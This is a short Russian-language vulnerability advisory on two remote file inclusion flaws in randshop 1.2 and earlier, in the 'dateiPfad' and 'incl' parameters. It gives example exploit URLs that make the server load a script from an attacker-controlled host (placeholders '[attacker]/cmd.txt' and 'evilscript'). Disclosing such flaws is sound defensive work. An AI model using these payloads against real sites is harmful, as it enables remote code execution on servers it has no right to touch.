• Партнер

  • Программа: randshop 1.2 и более ранние версии.

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

    1. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”dateiPfad” в сценарии includes/header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:

    http://[target]/[path]/includes/header.inc.php? dateiPfad=http://[attacker]/cmd.txt?&cmd=ls

    2. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”incl” в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:

    http://victim/randshop/index.php?incl=http://evilscript?

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии